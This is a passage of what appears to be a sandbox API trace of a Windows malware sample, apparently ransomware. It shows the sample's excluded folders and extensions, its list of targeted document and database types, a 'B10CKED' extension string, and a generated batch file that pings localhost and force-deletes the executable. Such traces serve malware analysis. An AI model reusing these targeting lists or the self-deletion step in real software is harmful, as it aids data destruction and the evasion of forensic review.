lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0174.976] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0174.976] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0174.976] LockResource (hResData=0x516f58) returned 0x516f58 [0174.976] FreeResource (hResData=0x516f58) returned 0 [0174.976] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.976] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.976] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.976] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.976] FreeResource (hResData=0x50d64c) returned 0 [0174.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0174.976] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0174.976] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0174.977] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0174.977] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0174.977] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0174.977] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xde8) returned 0xb8 [0175.001] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0175.001] ResumeThread (hThread=0xb8) returned 0x1 [0175.001] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0175.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0175.340] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0175.340] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0175.340] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0175.340] LockResource (hResData=0x5187d4) returned 0x5187d4 [0175.340] FreeResource (hResData=0x5187d4) returned 0 [0175.340] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0175.340] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0175.340] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0175.340] LockResource (hResData=0x50d64c) returned 0x50d64c [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0175.340] FreeResource (hResData=0x50d64c) returned 0 [0175.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0175.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0175.340] GetCurrentThreadId () returned 0x728 [0175.340] GetCurrentThreadId () returned 0x728 [0175.340] GetCurrentThreadId () returned 0x728 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0175.340] GetTickCount () returned 0x32f68 [0175.340] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=23212948936) returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="C畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="b畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="j畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="y畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="0畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="9畔﮴\x12\x1c翻") returned 1 [0175.340] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0175.341] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0175.341] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe") returned 0x30 [0175.341] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0175.341] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0175.341] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0175.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0175.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0175.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0175.341] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0175.342] CloseHandle (hObject=0xe8) returned 1 [0175.343] GetCurrentThreadId () returned 0x728 [0175.343] GetCurrentThreadId () returned 0x728 [0175.343] GetCurrentThreadId () returned 0x728 [0175.343] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xbf8, dwThreadId=0xbd8)) returned 1 [0175.357] CloseHandle (hObject=0xec) returned 1 [0175.357] CloseHandle (hObject=0xe8) returned 1 [0175.357] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] WSACleanup () returned 0 [0175.375] FreeLibrary (hLibModule=0x77380000) returned 1 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentProcess () returned 0xffffffff [0175.375] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, 